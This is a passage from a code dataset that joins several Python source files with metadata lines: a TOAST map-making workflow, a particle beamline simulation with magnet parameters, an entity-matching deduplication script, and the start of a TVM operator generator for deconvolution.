If noise estimation is not enabled, and no existing noise model\n # is found, then create a fake noise model with uniform weighting.\n\n noise_model = None\n\n if ops.noise_estim.enabled:\n ops.noise_estim.detector_pointing = job.pixels_final.detector_pointing\n ops.noise_estim.pixel_pointing = job.pixels_final\n ops.noise_estim.stokes_weights = job.weights_final\n ops.noise_estim.pixel_dist = ops.binner_final.pixel_dist\n ops.noise_estim.output_dir = args.out_dir\n ops.noise_estim.apply(data)\n log.info_rank(\"Estimated noise in\", comm=world_comm, timer=timer)\n\n if ops.noise_fit.enabled:\n ops.noise_fit.apply(data)\n log.info_rank(\"Fit noise model in\", comm=world_comm, timer=timer)\n log.info_rank(\"Using noise model from 1/f fit\", comm=world_comm)\n noise_model = ops.noise_fit.out_model\n else:\n log.info_rank(\"Using noise model from raw estimate\", comm=world_comm)\n noise_model = ops.noise_estim.out_model\n else:\n have_noise = True\n for ob in data.obs:\n if \"noise_model\" not in ob:\n have_noise = False\n if have_noise:\n log.info_rank(\"Using noise model from data files\", comm=world_comm)\n noise_model = \"noise_model\"\n else:\n for ob in data.obs:\n (estrate, _, _, _, _) = toast.utils.rate_from_times(\n ob.shared[defaults.times].data\n )\n ob[\"fake_noise\"] = toast.noise_sim.AnalyticNoise(\n detectors=ob.all_detectors,\n rate={x: estrate * u.Hz for x in ob.all_detectors},\n fmin={x: 1.0e-5 * u.Hz for x in ob.all_detectors},\n fknee={x: 0.0 * u.Hz for x in ob.all_detectors},\n alpha={x: 1.0 for x in ob.all_detectors},\n NET={\n x: 1.0 * u.K * np.sqrt(1.0 * u.second) for x in ob.all_detectors\n },\n )\n log.info_rank(\n \"Using fake noise model with uniform weighting\", comm=world_comm\n )\n noise_model = \"fake_noise\"\n ops.binner.noise_model = noise_model\n ops.binner_final.noise_model = noise_model\n\n # Optional geometric factors\n\n ops.h_n.pixel_pointing = job.pixels_final\n ops.h_n.pixel_dist = ops.binner_final.pixel_dist\n 
ops.h_n.noise_model = noise_model\n ops.h_n.output_dir = args.out_dir\n if ops.h_n.enabled:\n ops.h_n.apply(data)\n log.info_rank(\"Calculated h_n in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After h_n map\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"H_n map calculation disabled\", comm=world_comm)\n\n ops.cadence_map.pixel_pointing = job.pixels_final\n ops.cadence_map.pixel_dist = ops.binner_final.pixel_dist\n ops.cadence_map.output_dir = args.out_dir\n if ops.cadence_map.enabled:\n ops.cadence_map.apply(data)\n log.info_rank(\"Calculated cadence map in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After cadence map\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Cadence map calculation disabled\", comm=world_comm)\n\n ops.crosslinking.pixel_pointing = job.pixels_final\n ops.crosslinking.pixel_dist = ops.binner_final.pixel_dist\n ops.crosslinking.output_dir = args.out_dir\n if ops.crosslinking.enabled:\n ops.crosslinking.apply(data)\n log.info_rank(\"Calculated crosslinking in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After crosslinking map\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Crosslinking map calculation disabled\", comm=world_comm)\n\n # Collect signal statistics before filtering\n\n ops.raw_statistics.output_dir = args.out_dir\n if ops.raw_statistics.enabled:\n ops.raw_statistics.apply(data)\n log.info_rank(\"Calculated raw statistics in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After raw statistics\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Raw statistics disabled\", comm=world_comm)\n\n # Deconvolve a time constant\n\n if ops.deconvolve_time_constant.enabled:\n ops.deconvolve_time_constant.apply(data)\n log.info_rank(\"Deconvolved time constant in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After deconvolving time constant\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Timeconstant deconvolution disabled\", 
comm=world_comm)\n\n # Run ML mapmaker\n\n ops.mlmapmaker.out_dir = args.out_dir\n if ops.mlmapmaker.enabled:\n ops.mlmapmaker.apply(data)\n log.info_rank(\"Finished ML map-making in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"ML map-making disabled\", comm=world_comm)\n\n # Apply the filter stack\n\n log.info_rank(\"Begin Filtering\", comm=world_comm)\n\n if ops.groundfilter.enabled:\n ops.groundfilter.apply(data)\n log.info_rank(\"Finished ground-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"Ground-filtering disabled\", comm=world_comm)\n\n if ops.polyfilter1D.enabled:\n ops.polyfilter1D.apply(data)\n log.info_rank(\"Finished 1D-poly-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"1D-poly-filtering disabled\", comm=world_comm)\n\n if ops.polyfilter2D.enabled:\n ops.polyfilter2D.apply(data)\n log.info_rank(\"Finished 2D-poly-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"2D-poly-filtering disabled\", comm=world_comm)\n\n if ops.common_mode_filter.enabled:\n ops.common_mode_filter.apply(data)\n log.info_rank(\"Finished common-mode-filtering in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"common-mode-filtering disabled\", comm=world_comm)\n\n ops.mem_count.prefix = \"After filtering\"\n ops.mem_count.apply(data)\n\n # The map maker requires the binning operators used for the solve and final,\n # the templates, and the noise model.\n\n ops.mapmaker.binning = ops.binner\n\n tmpls.baselines.noise_model = noise_model\n\n ops.mapmaker.template_matrix = toast.ops.TemplateMatrix(\n templates=[tmpls.baselines,]\n )\n ops.mapmaker.map_binning = ops.binner_final\n ops.mapmaker.det_data = defaults.det_data\n ops.mapmaker.output_dir = args.out_dir\n if ops.mapmaker.enabled:\n log.info_rank(\"Begin generalized destriping map-maker\", comm=world_comm)\n # if not tmpls.baselines.enabled and not tmpls.fourier.enabled:\n if not tmpls.baselines.enabled:\n log.info_rank(\n \" No 
solver templates are enabled- only making a binned map\",\n comm=world_comm,\n )\n ops.mapmaker.apply(data)\n log.info_rank(\"Finished generalized destriper in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After generalized destriping map-maker\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Generalized destriping map-maker disabled\", comm=world_comm)\n\n ops.filterbin.binning = ops.binner_final\n ops.filterbin.det_data = defaults.det_data\n ops.filterbin.output_dir = args.out_dir\n if ops.filterbin.enabled:\n log.info_rank(\n \"Begin simultaneous filter/bin map-maker and observation matrix\",\n comm=world_comm,\n )\n ops.filterbin.apply(data)\n ops.mem_count.prefix = \"After simultaneous filter/bin map-maker\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Simultaneous filter/bin map-maker disabled\", comm=world_comm)\n\n if ops.mlmapmaker.enabled:\n log.info_rank(\n \"Begin ML map-maker\",\n comm=world_comm,\n )\n ops.mlmapmaker.apply(data)\n log.info_rank(\"Finished ML map-making in\", comm=world_comm, timer=timer)\n else:\n log.info_rank(\"ML map-maker disabled\", comm=world_comm)\n\n # Collect signal statistics after filtering/destriping\n\n ops.filtered_statistics.output_dir = args.out_dir\n if ops.filtered_statistics.enabled:\n ops.filtered_statistics.apply(data)\n log.info_rank(\"Calculated filtered statistics in\", comm=world_comm, timer=timer)\n ops.mem_count.prefix = \"After filtered statistics\"\n ops.mem_count.apply(data)\n else:\n log.info_rank(\"Filtered statistics disabled\", comm=world_comm)\n\n\ndef main():\n env = toast.utils.Environment.get()\n log = toast.utils.Logger.get()\n gt = toast.timing.GlobalTimers.get()\n gt.start(\"toast_so_map (total)\")\n timer0 = toast.timing.Timer()\n timer0.start()\n\n # Get optional MPI parameters\n comm, procs, rank = toast.get_world()\n\n if \"OMP_NUM_THREADS\" in os.environ:\n nthread = os.environ[\"OMP_NUM_THREADS\"]\n else:\n nthread = 1\n log.info_rank(\n f\"Executing workflow 
with {procs} MPI tasks, each with \"\n f\"{nthread} OpenMP threads at {datetime.datetime.now()}\",\n comm,\n )\n\n mem = toast.utils.memreport(msg=\"(whole node)\", comm=comm, silent=True)\n log.info_rank(f\"Start of the workflow: {mem}\", comm)\n\n # The operators we want to configure from the command line or a parameter file.\n # We will use other operators, but these are the ones that the user can configure.\n # The \"name\" of each operator instance controls what the commandline and config\n # file options will be called.\n #\n # We can also set some default values here for the traits, including whether an\n # operator is disabled by default.\n\n operators = [\n toast.ops.PointingDetectorSimple(name=\"det_pointing_azel\", quats=\"quats_azel\"),\n toast.ops.PointingDetectorSimple(\n name=\"det_pointing_radec\", quats=\"quats_radec\"\n ),\n toast.ops.StokesWeights(\n name=\"weights_azel\", weights=\"weights_azel\", mode=\"IQU\"\n ),\n toast.ops.StokesWeights(name=\"weights_radec\", mode=\"IQU\"),\n toast.ops.PixelsHealpix(\n name=\"pixels_healpix_radec\",\n enabled=False,\n ),\n toast.ops.PixelsWCS(\n name=\"pixels_wcs_radec\",\n project=\"CAR\",\n resolution=(0.005 * u.degree, 0.005 * u.degree),\n auto_bounds=True,\n enabled=True,\n ),\n toast.ops.PixelsWCS(\n name=\"pixels_wcs_azel\",\n project=\"CAR\",\n resolution=(0.05 * u.degree, 0.05 * u.degree),\n auto_bounds=True,\n enabled=False,\n ),\n toast.ops.NoiseEstim(\n name=\"noise_estim\",\n out_model=\"estimated_noise\",\n enabled=False,\n ),\n toast.ops.FitNoiseModel(\n name=\"noise_fit\",\n noise_model=\"estimated_noise\",\n out_model=\"estimated_noise_fit\",\n enabled=False,\n ),\n toast.ops.FlagSSO(name=\"flag_sso\", enabled=False),\n so_ops.Hn(name=\"h_n\", enabled=False),\n toast.ops.CadenceMap(name=\"cadence_map\", enabled=False),\n toast.ops.CrossLinking(name=\"crosslinking\", enabled=False),\n toast.ops.Statistics(name=\"raw_statistics\", enabled=False),\n toast.ops.TimeConstant(\n 
name=\"deconvolve_time_constant\", deconvolve=True, enabled=False\n ),\n toast.ops.GroundFilter(name=\"groundfilter\", enabled=False),\n toast.ops.PolyFilter(name=\"polyfilter1D\", enabled=False),\n toast.ops.PolyFilter2D(name=\"polyfilter2D\", enabled=False),\n toast.ops.CommonModeFilter(name=\"common_mode_filter\", enabled=False),\n toast.ops.Statistics(name=\"filtered_statistics\", enabled=False),\n toast.ops.BinMap(name=\"binner\", pixel_dist=\"pix_dist\"),\n toast.ops.MapMaker(name=\"mapmaker\"),\n toast.ops.PixelsHealpix(name=\"pixels_healpix_radec_final\", enabled=False),\n toast.ops.PixelsWCS(name=\"pixels_wcs_radec_final\", enabled=False),\n toast.ops.PixelsWCS(name=\"pixels_wcs_azel_final\", enabled=False),\n toast.ops.BinMap(\n name=\"binner_final\", enabled=False, pixel_dist=\"pix_dist_final\"\n ),\n toast.ops.FilterBin(name=\"filterbin\", enabled=False),\n so_ops.MLMapmaker(name=\"mlmapmaker\", enabled=False, comps=\"TQU\"),\n toast.ops.MemoryCounter(name=\"mem_count\", enabled=False),\n ]\n\n # Templates we want to configure from the command line or a parameter file.\n templates = [\n toast.templates.Offset(name=\"baselines\", enabled=False),\n # toast.templates.Fourier2D(name=\"fourier\", enabled=False),\n ]\n\n # Parse options\n config, args, jobargs = parse_config(operators, templates, comm)\n\n # Instantiate our operators and get the size of the process groups\n job, group_size, full_pointing = job_create(config, comm)\n\n # Create the toast communicator\n toast_comm = toast.Comm(world=comm, groupsize=group_size)\n\n # Load one or more observations\n data = load_data(job, args, toast_comm)\n\n # Reduce the data\n reduce_data(job, args, data)\n\n # Collect optional timing information\n alltimers = toast.timing.gather_timers(comm=toast_comm.comm_world)\n if toast_comm.world_rank == 0:\n out = os.path.join(args.out_dir, \"timing\")\n toast.timing.dump(alltimers, out)\n\n log.info_rank(\"Workflow completed in\", comm=comm, timer=timer0)\n\n\ndef 
cli():\n world, procs, rank = toast.mpi.get_world()\n with toast.mpi.exception_guard(comm=world):\n main()\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"sotodlib/toast/workflows/toast_so_map.py","file_name":"toast_so_map.py","file_ext":"py","file_size_in_byte":24187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334120892","text":"\"\"\"\n2021年5月24日\n\n矫正踢腿磁铁设计\n\n现在的情况是这样的:\n前偏转段优化后,不同动量分散下的相椭圆形状、Δx、Δy、Δxp都可以,唯独 Δxp 会变动,大约是 4mr/%\n现在打算加入矫正踢腿磁铁\n\n先看看没有动量分散下,全段情况\n\"\"\"\n\n# 因为要使用父目录的 cctpy 所以加入\nfrom os import error, path\nimport sys\nsys.path.append(path.dirname(path.abspath(path.dirname(__file__))))\nfrom work.A01run import *\nfrom cctpy import *\n\n\ndef beamline_phase_ellipse_multi_delta(bl: Beamline, particle_number: int,\n dps: List[float], describles: str = ['r-', 'y-', 'b-', 'k-', 'g-', 'c-', 'm-'],\n foot_step: float = 20*MM, report: bool = True):\n if len(dps) > len(describles):\n print(\n f'describles(size={len(describles)}) 长度应大于等于 dps(size={len(dps)})')\n xs = []\n ys = []\n for dp in dps:\n x, y = bl.track_phase_ellipse(\n x_sigma_mm=3.5, xp_sigma_mrad=7.5,\n y_sigma_mm=3.5, yp_sigma_mrad=7.5,\n delta=dp, particle_number=particle_number,\n kinetic_MeV=215, concurrency_level=16,\n footstep=foot_step,\n report=report\n )\n xs.append(x + [x[0]])\n ys.append(y + [y[0]])\n\n plt.subplot(121)\n\n for i in range(len(dps)):\n plt.plot(*P2.extract(xs[i]), describles[i])\n plt.xlabel(xlabel='x/mm')\n plt.ylabel(ylabel='xp/mr')\n plt.title(label='x-plane')\n plt.legend(['dp'+str(int(dp*1000)/10) for dp in dps])\n plt.axis(\"equal\")\n\n plt.subplot(122)\n for i in range(len(dps)):\n plt.plot(*P2.extract(ys[i]), describles[i])\n plt.xlabel(xlabel='y/mm')\n plt.ylabel(ylabel='yp/mr')\n plt.title(label='y-plane')\n plt.legend(['dp'+str(int(dp*1000)/10) for dp in dps])\n plt.axis(\"equal\")\n\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n 
BaseUtils.i_am_sure_my_code_closed_in_if_name_equal_main()\n\n param = [5.498,\t-3.124, \t30.539, \t0.383,\n 84.148, \t94.725,\t82.377,\n 100.672,\t72.283 \t, 99.973,\n -9807.602,\t9999.989 \t, 25.000,\t24.000\n ]\n\n qs1_g = param[0]\n qs2_g = param[1]\n\n qs1_s = param[2]\n qs2_s = param[3]\n\n dicct_tilt_1 = param[4]\n dicct_tilt_2 = param[5]\n dicct_tilt_3 = param[6]\n\n agcct_tilt_0 = param[7]\n agcct_tilt_2 = param[8]\n agcct_tilt_3 = param[9]\n\n dicct_current = param[10]\n agcct_current = param[11]\n\n agcct1_wn = int(param[12])\n agcct2_wn = int(param[13])\n\n\n qs1_gradient=qs1_g\n qs2_gradient=qs2_g\n qs1_second_gradient=qs1_s\n qs2_second_gradient=qs2_s\n\n qs1_aperture_radius=60*MM\n qs2_aperture_radius=60*MM\n\n dicct12_tilt_angles=[30, dicct_tilt_1, dicct_tilt_2, dicct_tilt_3]\n agcct12_tilt_angles=[agcct_tilt_0, 30, agcct_tilt_2, agcct_tilt_3]\n\n dicct12_current=dicct_current\n agcct12_current=agcct_current\n\n agcct1_winding_number=agcct1_wn\n agcct2_winding_number=agcct2_wn\n dicct12_winding_number=42\n\n\n agcct1_bending_angle=22.5 * (agcct1_wn / (agcct1_wn + agcct2_wn))\n agcct2_bending_angle=22.5 * (agcct2_wn / (agcct1_wn + agcct2_wn))\n\n DL1=0.9007765\n GAP1=0.4301517\n GAP2=0.370816\n qs1_length=0.2340128\n qs2_length=0.200139\n\n DL2=2.35011\n GAP3=0.43188\n qs3_length=0.24379\n qs3_aperture_radius=60 * MM\n qs3_gradient=-7.3733\n qs3_second_gradient=-45.31 * 2\n\n agcct12_inner_small_r=92.5 * MM - 20 * MM # 92.5\n agcct12_outer_small_r=108.5 * MM - 20 * MM # 83+15\n dicct12_inner_small_r=124.5 * MM - 20 * MM # 83+30+1\n dicct12_outer_small_r=140.5 * MM - 20 * MM # 83+45 +2\n\n dicct345_tilt_angles=[30, 88.773,\t98.139, 91.748]\n agcct345_tilt_angles=[101.792, 30, 62.677,\t89.705]\n dicct345_current=9409.261\n agcct345_current=-7107.359\n agcct3_winding_number=25\n agcct4_winding_number=40\n agcct5_winding_number=34\n agcct3_bending_angle=-67.5 * (25 / (25 + 40 + 34))\n agcct4_bending_angle=-67.5 * (40 / (25 + 40 + 34))\n 
agcct5_bending_angle=-67.5 * (34 / (25 + 40 + 34))\n\n agcct345_inner_small_r=92.5 * MM + 0.1*MM # 92.5\n agcct345_outer_small_r=108.5 * MM + 0.1*MM # 83+15\n dicct345_inner_small_r=124.5 * MM + 0.1*MM # 83+30+1\n dicct345_outer_small_r=140.5 * MM + 0.1*MM # 83+45 +2\n\n dicct345_winding_number=128\n part_per_winding=120\n\n\n deltas = BaseUtils.list_multiply([-4,-2,0,2,4],0.01)\n fields = [0,-0.05,-0.05,-0.1,-0.07]\n cs = ['r-', 'y-', 'b-', 'k-', 'g-', 'c-', 'm-']\n\n for i in range(len(fields)):\n straight_dipole_magnet_filed = fields[i]\n bl = Beamline = (\n Beamline.set_start_point(P2.origin()) # 设置束线的起点\n # 设置束线中第一个漂移段(束线必须以漂移段开始)\n .first_drift(direct=P2.x_direct(), length=DL1)\n .append_agcct( # 尾接 acgcct\n big_r=0.95, # 偏转半径\n # 二极 CCT 和四极 CCT 孔径\n small_rs=[dicct12_outer_small_r, dicct12_inner_small_r,\n agcct12_outer_small_r, agcct12_inner_small_r],\n bending_angles=[agcct1_bending_angle,\n agcct2_bending_angle], # agcct 每段偏转角度\n tilt_angles=[dicct12_tilt_angles,\n agcct12_tilt_angles], # 二极 CCT 和四极 CCT 倾斜角\n winding_numbers=[[dicct12_winding_number], [\n agcct1_winding_number, agcct2_winding_number]], # 二极 CCT 和四极 CCT 匝数\n # 二极 CCT 和四极 CCT 电流\n currents=[dicct12_current, agcct12_current],\n disperse_number_per_winding=part_per_winding # 每匝分段数目\n )\n .append_drift(GAP1) # 尾接漂移段\n .append_qs( # 尾接 QS 磁铁\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs2_length,\n gradient=qs2_gradient,\n second_gradient=qs2_second_gradient,\n aperture_radius=qs2_aperture_radius\n )\n .append_drift(GAP2)\n .append_qs(\n length=qs1_length,\n gradient=qs1_gradient,\n second_gradient=qs1_second_gradient,\n aperture_radius=qs1_aperture_radius\n )\n .append_drift(GAP1)\n .append_agcct(\n big_r=0.95,\n small_rs=[dicct12_outer_small_r, dicct12_inner_small_r,\n agcct12_outer_small_r, agcct12_inner_small_r],\n bending_angles=[agcct2_bending_angle,\n 
agcct1_bending_angle],\n tilt_angles=[dicct12_tilt_angles,\n agcct12_tilt_angles],\n winding_numbers=[[dicct12_winding_number], [\n agcct2_winding_number, agcct1_winding_number]],\n currents=[dicct12_current, agcct12_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL1-0.1)\n .append_straight_dipole_magnet(\n magnetic_field=straight_dipole_magnet_filed,\n length=0.2,\n aperture_radius=60*MM\n )\n # 第二段\n .append_drift(DL2-0.1)\n .append_agcct(\n big_r=0.95,\n small_rs=[dicct345_outer_small_r, dicct345_inner_small_r,\n agcct345_outer_small_r, agcct345_inner_small_r],\n bending_angles=[agcct3_bending_angle,\n agcct4_bending_angle, agcct5_bending_angle],\n tilt_angles=[dicct345_tilt_angles,\n agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [\n agcct3_winding_number, agcct4_winding_number, agcct5_winding_number]],\n currents=[dicct345_current, agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(GAP3)\n .append_qs(\n length=qs3_length,\n gradient=qs3_gradient,\n second_gradient=qs3_second_gradient,\n aperture_radius=qs3_aperture_radius\n )\n .append_drift(GAP3)\n .append_agcct(\n big_r=0.95,\n small_rs=[dicct345_outer_small_r, dicct345_inner_small_r,\n agcct345_outer_small_r, agcct345_inner_small_r],\n bending_angles=[agcct5_bending_angle,\n agcct4_bending_angle, agcct3_bending_angle],\n tilt_angles=[dicct345_tilt_angles,\n agcct345_tilt_angles],\n winding_numbers=[[dicct345_winding_number], [\n agcct5_winding_number, agcct4_winding_number, agcct3_winding_number]],\n currents=[dicct345_current, agcct345_current],\n disperse_number_per_winding=part_per_winding\n )\n .append_drift(DL2)\n )\n \n xs,ys = bl.track_phase_ellipse(\n x_sigma_mm=3.5,xp_sigma_mrad=7.5,\n y_sigma_mm=3.5,yp_sigma_mrad=7.5,\n delta=deltas[i],\n particle_number=8,\n kinetic_MeV=215,\n concurrency_level=16,\n footstep=20*MM\n )\n\n Plot2.plot_p2s(xs,describe=cs[i],circle=True)\n \n Plot2.equal()\n 
Plot2.legend(*[str(int(deltas[i]*100))+\"%:\"+str(fields[i])+\"T\" for i in range(len(fields))])\n Plot2.info(\"x/mm\",\"y/mm\",\"\")\n Plot2.show()\n\n","sub_path":"final_code/work/recycle_bin/B04矫正踢腿磁场和能散匹配.py","file_name":"B04矫正踢腿磁场和能散匹配.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314524935","text":"'''\nDate: 25 June 2018\nPurpose: Dedup files based on entity matching api\nData Integration Assignment 3\n\nSUBMISSION BY: GROUP B\n NAME: Abhishek Shrestha (Matr. Nummer: 390055)\n Jia Jia (Matr. Nummer: 389917)\n Syed Salman Ali (Matr. Nummer: 395898)\n\n\n https://gitlab.tu-berlin.de/mandir123/DataIntegration\n \nFor the given dataset, \n TASK 2. Use partioning/ blocking for duplicate detection.\n\n\n'''\n\nimport csv\nimport py_entitymatching as em\nimport pandas as pd\nimport datetime\n\n'''\n Ref. from: https://nbviewer.jupyter.org/github/anhaidgroup/py_entitymatching/blob/rel_0.1.x/notebooks/guides/step_wise_em_guides/Down%20Sampling.ipynb\n The code is ported to python but the logic of downsampling is originally from the above source :)\n'''\n\n\n\ncsv_source = 'D:\\TU\\_SEM 3\\800-6\\Data Integration\\DataIntegration\\Assignments\\Assignment 3\\Source\\inputDB.csv'\n\n#Read the source csv\nStartTime = datetime.datetime.now()\nprint('Started at: '+ str(StartTime))\nSource_1 = em.read_csv_metadata(csv_source, low_memory=False) # setting the parameter low_memory to False to speed up loading.\nLen_Source_1 = len(Source_1)\nprint('Number of records on source Sample: %d' % Len_Source_1)\n\nSource_2 = em.read_csv_metadata(csv_source, low_memory=False) # setting the parameter low_memory to False to speed up loading. 
\nLen_Source_1 = len(Source_2)\n\n#Set key\nem.set_key(Source_1, 'RecID')\nem.set_key(Source_2, 'RecID')\n\n#Start Downsampling\nSample_1, Sample_2 = em.down_sample(Source_1, Source_2, size=10000, y_param=1, show_progress=True)\nprint('Downsampling is complete...')\nprint('Number of records on source Sample: %d' % len(Sample_1))\nprint(len(Sample_1))\nprint('______________________')\nprint('Sample Head...')\nprint(Sample_1.head())\nprint('______________________')\nprint('Sample Properties are: ')\nem.show_properties(Sample_1)\nem.show_properties(Sample_2)\n\n#Blocking using an attribute blocker\nat_blocker = em.AttrEquivalenceBlocker()\nA_block = at_blocker.block_tables(Sample_1, Sample_2, \n l_block_attr = 'SSN', r_block_attr = 'SSN', \n l_output_attrs= ['SSN'], r_output_attrs= ['SSN'], \n l_output_prefix ='L_', r_output_prefix='R_')\n \nprint('______________________')\nprint('After Blocking...')\nprint(A_block.head())\nB_block = A_block[A_block.L_RecID != A_block.R_RecID]\n\n#write to outpupt file\nwith open(\"D:\\\\output.csv\", 'w') as File: \n for index, row in B_block.iterrows():\n File.write(str(row['L_RecID'] + \", \" + row['R_RecID'] + \"\\n\"))\nEndTime = datetime.datetime.now()\nprint('Ended at:'+ str(EndTime))\nduration_seconds = (EndTime - StartTime).total_seconds()\nduration_in_minutes = divmod(duration_seconds, 60)[0] \nprint('Total time taken: ' + str(duration_in_minutes))\n ","sub_path":"Submission/Source/Task 2/Source/EntityMatching_dem.py","file_name":"EntityMatching_dem.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605344778","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable 
law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nThis module is rule to generation tvm operate, call by at_gen_strip.py\n\"\"\"\nimport numpy as np\nimport tvm\nimport topi\nfrom topi.image import resize\nfrom topi.nn import mirror_pad\nfrom topi import tag\nimport topi.testing\n\nfrom arm_cpu.deconv import _conv_spatial_pack_deconv, schedule_conv2d_nchw_arm_cpu_deconv\nfrom arm_cpu.conv2d import _conv_spatial_pack_asm, schedule_conv2d_nchw_arm_cpu\nfrom arm_cpu.matmul import _matmul_spatial_pack_asm, _matmul_schedule_asm\nfrom arm_cpu.depthwise_conv2d import _depthwise_spatial_pack, schedule_depthwise_conv2d_nchw_arm\nfrom config_tool import activation_enum_map\n\nmap_conv = {\n 'Convolution': \"Conv2D\",\n 'ConvolutionDepthwise': \"DepthwiseConv2D\",\n 'Deconvolution': \"DeConv2D\",\n 'DeConvolutionDepthwise': \"DeDepthwiseConv2D\",\n}\n\n\ndef Genlib(sch, tensor_list, device, opname, lib_path, print_lower=False):\n if print_lower:\n print(tvm.lower(sch, tensor_list, simple_mode=True))\n ctx = tvm.context(device, 0)\n func_o = tvm.build(sch, tensor_list, device + \" --system-lib\", name=opname)\n func_so = tvm.build(sch, tensor_list, device, name=opname)\n func_o.save(lib_path + opname + \".o\", \"o\")\n return func_o, func_so, ctx\n\n\ndef AsType(as_input, dtype):\n if as_input.dtype == dtype:\n return as_input\n return tvm.compute(as_input.shape,\n lambda *i: as_input(*i).astype(dtype),\n tag=\"injective\")\n\n\n@tvm.tag_scope(tag=tag.ELEMWISE)\ndef TopiNNrelu6(x):\n return tvm.compute(x.shape, lambda *i: tvm.min(tvm.max(x(*i), tvm.const(0, x.dtype)), tvm.const(6, x.dtype)))\n\n\ndef TopiActivation(in_tensor, a_type, memcpy=False):\n 
'''\n activativation\n Args:\n in_tensor:\n a_type:\n memcpy:\n\n Returns:\n '''\n if a_type == 'NO_ACTIVATION':\n if memcpy:\n return tvm.compute(in_tensor.shape, lambda *i: in_tensor[i], tag=tag.ELEMWISE)\n return in_tensor\n if a_type == 'RELU':\n return topi.nn.relu(in_tensor)\n if a_type == 'RELU6':\n return TopiNNrelu6(in_tensor)\n if a_type == 'SIGMOID':\n if in_tensor.dtype in [\"uint8\", \"int8\", \"uint32\", \"int32\"]:\n a_fp32 = AsType(in_tensor, 'float32')\n out_tensor = topi.sigmoid(a_fp32)\n return AsType(out_tensor, in_tensor.dtype)\n return topi.sigmoid(in_tensor)\n raise ValueError(\"not support activation type\" + a_type)\n\n\ndef Deconv(device=\"llvm\", lib_path=\"./\", optype=None,\n ndim=None, dtype=None, kernels=None,\n strides=None, pad=None, dilations=None,\n hasbias=None, activation_type=None,\n config_entity=None, impl_dtype=None,\n use_arm32=False, cfg=None):\n '''\n Deconvolution\n Args:\n device:\n lib_path:\n optype:\n ndim:\n dtype:\n kernels:\n strides:\n pad:\n dilations:\n hasbias:\n activationType:\n configEntity:\n impl_dtype:\n use_arm32:\n cfg:\n\n Returns:\n '''\n if cfg is None:\n cfg = {'CI': tvm.var('ci'), 'VH': 2, 'VW': 2, 'VC': 4, 'VI': 4,\n 'tile_oh': 2, 'tile_ow': 2, 'tile_co': 4,\n 'ann_reduce': ['none', 'none'],\n \"ann_spatial\": ['none', 'none', 'none']\n }\n has_bias = hasbias\n batch = tvm.var(\"batch\")\n in_channel = tvm.var(\"in_channel\")\n in_height, in_width = tvm.var(\"in_height\"), tvm.var(\"in_width\")\n kh, kw = kernels\n ow = cfg['VW']\n oh = cfg['VH']\n oc = cfg['VC']\n op_name = \"%s_ndim%d_%s_k%d_s%d_p%d%d%d%d_d%d_act%d_vc%d_vh%d_vw%d_hasbias%d\" % (\\\n map_conv[optype], ndim, dtype,\\\n kh, strides[0], pad[0], pad[1], pad[2], pad[3], dilations[0],\\\n activation_enum_map[activation_type], oc, oh, ow, hasbias)\n opname = op_name\n print(\"DEconv\", opname, config_entity)\n\n if impl_dtype is None:\n impl_dtype = dtype\n\n out_channel = tvm.var(\"out_channel\")\n\n # define placeholder\n 
input_tensor = in_tensor = tvm.placeholder((batch, in_channel, in_height, in_width, 4), \\\n dtype=dtype, name='in_tensor')\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel*4, out_channel, kh, kw), dtype=dtype, \\\n name='kernel_tensor')\n if has_bias:\n bias = tvm.placeholder((out_channel,), dtype=dtype, name='bias')\n bias1 = topi.reshape(bias, (out_channel, 1, 1))\n\n if impl_dtype != dtype:\n input_tensor = AsType(input_tensor, impl_dtype)\n temp_tensor = AsType(temp_tensor, impl_dtype)\n if has_bias:\n bias1 = AsType(bias1, impl_dtype)\n\n # define compute & schedule\n cfg1 = (True, 1, 1, 1) if cfg is None else (True, cfg[\"tile_oh\"], cfg[\"tile_ow\"], cfg[\"tile_co\"])\n out_tensor = _conv_spatial_pack_deconv(cfg1, input_tensor, temp_tensor, out_dtype=impl_dtype)\n\n if has_bias:\n out_tensor = tvm.compute(out_tensor.shape, lambda n, co, h, w, c4: \\\n out_tensor[n, co, h, w, c4] + bias1[co*4 + 